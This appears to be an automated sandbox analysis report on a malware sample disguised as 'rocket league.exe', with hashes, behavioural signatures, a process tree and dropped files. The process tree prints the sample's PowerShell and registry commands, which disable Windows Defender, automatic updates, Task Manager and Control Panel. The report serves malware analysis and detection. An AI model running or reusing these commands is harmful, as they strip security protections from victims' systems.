Analysis

  • max time kernel
    138s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    26/05/2024, 00:19

General

  • Target
    rocket league.exe
  • Size
    5.2MB
  • MD5
    a66c11e16baaf08400416e305b5118c4
  • SHA1
    3d49238bc8e4865871306416ed8d308745aa4fa4
  • SHA256
    38992ee97c1b46dc373cdd5f32fb5de1e5bb8da4e81734d84f860dc92fd41cf2
  • SHA512
    440a6a8b1de909e3e20fb768ef55596bb530413c4b4df317d8a145be8f1527c0b8788d415f705893b1b1be07a42e80f57f044aa1b1f65197a56b98afe3692de7
  • SSDEEP
    98304:onD+rKIDTGpzoLLJ3TbwaVvrZE0IdeyoFQK15W8ASLmbNYJERw1jrTH31DzZGYn:onqeIm9onJ5hrZEReyiU8AdZYJERurTr

Score
8/10

Malware Config

Signatures

  • Disables Task Manager via registry modification
  • Drops startup file 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\rocket league.exe
    "C:\Users\Admin\AppData\Local\Temp\rocket league.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2280
    • C:\Users\Admin\AppData\Local\Temp\rocket league.exe
      "C:\Users\Admin\AppData\Local\Temp\rocket league.exe"
      2⤵
      • Drops startup file
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1880
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "sc config WinDefend start= disabled"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4456
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "net stop WinDefend"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2756
        • C:\Windows\system32\net.exe
          "C:\Windows\system32\net.exe" stop WinDefend
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1844
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop WinDefend
            5⤵
            PID:4288
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "reg add \"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:516
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          4⤵
          PID:3956
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "reg add \"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\" /v NoAutoUpdate /t REG_DWORD /d 1 /f"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3204
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /t REG_DWORD /d 1 /f
          4⤵
          PID:3952
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "reg add \"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Explorer\" /v DisableNotificationCenter /t REG_DWORD /d 1 /f"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:940
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f
          4⤵
          PID:4824
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "reg add \"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization\" /v NoLockScreen /t REG_DWORD /d 1 /f"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2956
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization /v NoLockScreen /t REG_DWORD /d 1 /f
          4⤵
          PID:1388
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "reg add \"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\" /v DisableTaskMgr /t REG_DWORD /d 1 /f"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3824
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
          4⤵
          PID:4872
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "reg add \"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\" /v NoControlPanel /t REG_DWORD /d 1 /f"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2892
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
          4⤵
          PID:1572

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    • Filesize
      2KB
    • MD5
      6cf293cb4d80be23433eecf74ddb5503
    • SHA1
      24fe4752df102c2ef492954d6b046cb5512ad408
    • SHA256
      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
    • SHA512
      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    • Filesize
      944B
    • MD5
      2ad33642f863ae14ee53bc6853ee330e
    • SHA1
      ca81cc7d8c33a46ebe97bc1d3db55e41a813029e
    • SHA256
      17c7b3c895766071a0d87318ec4134a9032ed113b46d3ba75889819a61a9cc19
    • SHA512
      52c59a7bde3751e07da53f3942c15cc3e19a4bf1929fbc28ae568ed96531852747b4f724e01438e159c4c98bf2d846db205c48e32f4b5984e9fddeb936eb8aa9
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    • Filesize
      944B
    • MD5
      1542328a8546914b4e2f1aef9cb42bea
    • SHA1
      7a0ac5969dfb20eb974e8a3bd8707243fa68f94f
    • SHA256
      7584152ef93be4dc497db509c723f20a1fd09d69df02d62c897eefda6bf4c737
    • SHA512
      b2b117abc97a64a71538d57c7f6c68c405d7ff5ef91dafe768832ff63378cb627af8b035b2a803627754c2219dd26755a2fa28e3a1bb9b1deb32ba13487ee286
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    • Filesize
      944B
    • MD5
      2b09a4ee48534faf0a8f91aee9a1c92a
    • SHA1
      58db278bbe8453eb341294e7f303c2f2fca5815f
    • SHA256
      0cc656020d2efb13b0140e35229d04b3f10c64f0d2bc7813ef07160a65468263
    • SHA512
      3ba905d6b0e33804bef1917ab50666a3a6ec71a47e186f095aa4db4606ea189559b9192187d00895fe1f7a50f603076f4071ad33bf37a867ba960a11102e3a2a
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    • Filesize
      1KB
    • MD5
      88be3bc8a7f90e3953298c0fdbec4d72
    • SHA1
      f4969784ad421cc80ef45608727aacd0f6bf2e4b
    • SHA256
      533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a
    • SHA512
      4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    • Filesize
      64B
    • MD5
      421e2421d469a848255625b722ebff12
    • SHA1
      fe15054bd7268165f377de43706226af644e5af9
    • SHA256
      54436d18ea4ca55d4673917f78ea644b12d65f1f27cdee4b32e6987bc1deefed
    • SHA512
      f464f642f2a934e9507a64bf9d3043d4254405b15855a4d42af0d97341df9851b494cf6d164d6ac393d635040654bf4a33cc3c159b6ea8e05947d829c575e4e3
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    • Filesize
      944B
    • MD5
      8857491a4a65a9a1d560c4705786a312
    • SHA1
      4f3caf2ad5d66a2410c9cca0381d26a46e832cb4
    • SHA256
      b6e1a16a11075cb4e0bae0cebdb6ac15f5d66e0005f557703708a04cd11bd360
    • SHA512
      d9497c47898cdc4c4fc62158830dc931990e08bb4a28a5d19d4187a87a2afab8a4bd58ca346563210b476c9adb9a714bfe1057e0ebce85d1fd94731be6d02660
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    • Filesize
      944B
    • MD5
      a316ebd4efa11d6b6daf6af0cc1aebce
    • SHA1
      ab338dd719969c70590dbc039b90e2758c741762
    • SHA256
      f7308f111e3910da5c34c4d06d78d692f44419f848f5bf886fd466d5a96ad014
    • SHA512
      67a9b94b704222a1bbe02fa8780c6b9bd364c8581b693ca28c6a444fde160df216304426bacf6b01909b80540cf0add79669b7a88ca260a6fbc93c4742f36c5a
  • C:\Users\Admin\AppData\Local\Temp\_MEI22802\VCRUNTIME140.dll
    • Filesize
      99KB
    • MD5
      8697c106593e93c11adc34faa483c4a0
    • SHA1
      cd080c51a97aa288ce6394d6c029c06ccb783790
    • SHA256
      ff43e813785ee948a937b642b03050bb4b1c6a5e23049646b891a66f65d4c833
    • SHA512
      724bbed7ce6f7506e5d0b43399fb3861dda6457a2ad2fafe734f8921c9a4393b480cdd8a435dbdbd188b90236cb98583d5d005e24fa80b5a0622a6322e6f3987
  • C:\Users\Admin\AppData\Local\Temp\_MEI22802\_bz2.pyd
    • Filesize
      83KB
    • MD5
      6c7565c1efffe44cb0616f5b34faa628
    • SHA1
      88dd24807da6b6918945201c74467ca75e155b99
    • SHA256
      fe63361f6c439c6aa26fd795af3fd805ff5b60b3b14f9b8c60c50a8f3449060a
    • SHA512
      822445c52bb71c884461230bb163ec5dee0ad2c46d42d01cf012447f2c158865653f86a933b52afdf583043b3bf8ba7011cc782f14197220d0325e409aa16e22
  • C:\Users\Admin\AppData\Local\Temp\_MEI22802\_ctypes.pyd
    • Filesize
      122KB
    • MD5
      29da9b022c16da461392795951ce32d9
    • SHA1
      0e514a8f88395b50e797d481cbbed2b4ae490c19
    • SHA256
      3b4012343ef7a266db0b077bbb239833779192840d1e2c43dfcbc48ffd4c5372
    • SHA512
      5c7d83823f1922734625cf69a481928a5c47b6a3bceb7f24c9197175665b2e06bd1cfd745c55d1c5fe1572f2d8da2a1dcc1c1f5de0903477bb927aca22ecb26a
  • C:\Users\Admin\AppData\Local\Temp\_MEI22802\_decimal.pyd
    • Filesize
      264KB
    • MD5
      ce4df4dfe65ab8dc7ae6fcdebae46112
    • SHA1
      cdbbfda68030394ac90f6d6249d6dd57c81bc747
    • SHA256
      ffbe84f0a1eab363ca9cf73efb7518f2abd52c0893c7cc63266613c930855e96
    • SHA512
      fc8e39942e46e4494356d4a45257b657495cbfa20e9d67850627e188f70b149e22603ae4801b4ba7b9a04d201b3787899d2aee21565237d18e0afce9bae33ee9
  • C:\Users\Admin\AppData\Local\Temp\_MEI22802\_hashlib.pyd
    • Filesize
      63KB
    • MD5
      f377a418addeeb02f223f45f6f168fe6
    • SHA1
      5d8d42dec5d08111e020614600bbf45091c06c0b
    • SHA256
      9551431425e9680660c6baf7b67a262040fd2efceb241e4c9430560c3c1fafac
    • SHA512
      6f60bfac34ed55ff5d6ae10c6ec5511906c983e0650e5d47dac7b8a97a2e0739266cae009449cced8dff59037e2dbfc92065fbbdfde2636d13679e1629650280
  • C:\Users\Admin\AppData\Local\Temp\_MEI22802\_lzma.pyd
    • Filesize
      157KB
    • MD5
      b5355dd319fb3c122bb7bf4598ad7570
    • SHA1
      d7688576eceadc584388a179eed3155716c26ef5
    • SHA256
      b9bc7f1d8aa8498cb8b5dc75bb0dbb6e721b48953a3f295870938b27267fb5f5
    • SHA512
      0e228aa84b37b4ba587f6d498cef85aa1ffec470a5c683101a23d13955a8110e1c0c614d3e74fb0aa2a181b852bceeec0461546d0de8bcbd3c58cf9dc0fb26f5
  • C:\Users\Admin\AppData\Local\Temp\_MEI22802\_socket.pyd
    • Filesize
      77KB
    • MD5
      f5dd9c5922a362321978c197d3713046
    • SHA1
      4fbc2d3e15f8bb21ecc1bf492f451475204426cd
    • SHA256
      4494992665305fc9401ed327398ee40064fe26342fe44df11d89d2ac1cc6f626
    • SHA512
      ce818113bb87c6e38fa85156548c6f207aaab01db311a6d8c63c6d900d607d7beff73e64d717f08388ece4b88bf8b95b71911109082cf4b0c0a9b0663b9a8e99
  • C:\Users\Admin\AppData\Local\Temp\_MEI22802\base_library.zip
    • Filesize
      822KB
    • MD5
      d3a47ef5b669b3ab59aa27a54b015d24
    • SHA1
      d646309640b93ce05d268a00104d8a6ee6ee4463
    • SHA256
      b89ba73c7ce7a7800237401b351b047996f3c975f9e6ed401864f5481acf644f
    • SHA512
      09095fc7042a77f0c35f6a79d2c180b2660b613a82697a29662e39db80b3ed442c0433f915d17a271aba2f4f5c39615af2bac274de7095dd907413414d630dcc
  • C:\Users\Admin\AppData\Local\Temp\_MEI22802\libcrypto-1_1.dll
    • Filesize
      3.2MB
    • MD5
      cc4cbf715966cdcad95a1e6c95592b3d
    • SHA1
      d5873fea9c084bcc753d1c93b2d0716257bea7c3
    • SHA256
      594303e2ce6a4a02439054c84592791bf4ab0b7c12e9bbdb4b040e27251521f1
    • SHA512
      3b5af9fbbc915d172648c2b0b513b5d2151f940ccf54c23148cd303e6660395f180981b148202bef76f5209acc53b8953b1cb067546f90389a6aa300c1fbe477
  • C:\Users\Admin\AppData\Local\Temp\_MEI22802\libffi-7.dll
    • Filesize
      32KB
    • MD5
      eef7981412be8ea459064d3090f4b3aa
    • SHA1
      c60da4830ce27afc234b3c3014c583f7f0a5a925
    • SHA256
      f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081
    • SHA512
      dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016
  • C:\Users\Admin\AppData\Local\Temp\_MEI22802\python39.dll
    • Filesize
      4.3MB
    • MD5
      11c051f93c922d6b6b4829772f27a5be
    • SHA1
      42fbdf3403a4bc3d46d348ca37a9f835e073d440
    • SHA256
      0eabf135bb9492e561bbbc5602a933623c9e461aceaf6eb1ceced635e363cd5c
    • SHA512
      1cdec23486cffcb91098a8b2c3f1262d6703946acf52aa2fe701964fb228d1411d9b6683bd54527860e10affc0e3d3de92a6ecf2c6c8465e9c8b9a7304e2a4a6
  • C:\Users\Admin\AppData\Local\Temp\_MEI22802\select.pyd
    • Filesize
      26KB
    • MD5
      7a442bbcc4b7aa02c762321f39487ba9
    • SHA1
      0fcb5bbdd0c3d3c5943e557cc2a5b43e20655b83
    • SHA256
      1dd7bba480e65802657c31e6d20b1346d11bca2192575b45eb9760a4feb468ad
    • SHA512
      3433c46c7603ae0a73aa9a863b2aecd810f8c0cc6c2cd96c71ef6bde64c275e0fceb4ea138e46a5c9bf72f66dcdea3e9551cf2103188a1e98a92d8140879b34c
  • C:\Users\Admin\AppData\Local\Temp\_MEI22802\unicodedata.pyd
    • Filesize
      1.1MB
    • MD5
      8320c54418d77eba5d4553a5d6ec27f9
    • SHA1
      e5123cf166229aebb076b469459856a56fb16d7f
    • SHA256
      7e719ba47919b668acc62008079c586133966ed8b39fec18e312a773cb89edae
    • SHA512
      b9e6cdcb37d26ff9c573381bda30fa4cf1730361025cd502b67288c55744962bdd0a99790cedd4a48feef3139e3903265ab112ec545cb1154eaa2a91201f6b34
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ifx3jwpq.kiz.ps1
    • Filesize
      60B
    • MD5
      d17fe0a3f47be24a6453e9ef58c94641
    • SHA1
      6ab83620379fc69f80c0242105ddffd7d98d5d9d
    • SHA256
      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    • SHA512
      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • memory/2756-50-0x00007FFEFACC0000-0x00007FFEFB781000-memory.dmp
    • Filesize
      10.8MB
  • memory/2756-51-0x00007FFEFACC0000-0x00007FFEFB781000-memory.dmp
    • Filesize
      10.8MB
  • memory/2756-63-0x00007FFEFACC0000-0x00007FFEFB781000-memory.dmp
    • Filesize
      10.8MB
  • memory/4456-48-0x00007FFEFACC0000-0x00007FFEFB781000-memory.dmp
    • Filesize
      10.8MB
  • memory/4456-45-0x00007FFEFACC0000-0x00007FFEFB781000-memory.dmp
    • Filesize
      10.8MB
  • memory/4456-44-0x00007FFEFACC0000-0x00007FFEFB781000-memory.dmp
    • Filesize
      10.8MB
  • memory/4456-43-0x00007FFEFACC0000-0x00007FFEFB781000-memory.dmp
    • Filesize
      10.8MB
  • memory/4456-33-0x000001FA5A170000-0x000001FA5A192000-memory.dmp
    • Filesize
      136KB
  • memory/4456-32-0x00007FFEFACC3000-0x00007FFEFACC5000-memory.dmp
    • Filesize
      8KB